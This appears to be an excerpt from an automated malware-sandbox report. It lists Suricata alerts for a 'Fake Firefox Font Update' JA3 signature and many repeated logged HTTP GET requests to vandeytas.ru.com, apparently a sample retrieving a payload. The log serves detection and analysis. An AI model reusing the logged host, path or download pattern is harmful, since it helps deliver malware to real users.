      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49769 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49785 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49796 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49789 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49810 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49824 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49817 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49761 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49838 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49831 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49866 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49881 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49876 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49900 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49914 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49921 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49935 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49928 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49962 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49976 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49845 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49990 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49870 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49955 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49949 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49887 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49894 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49969 -> 50.7.187.218:443
      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 50.7.187.218:443
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
      Source: global trafficHTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
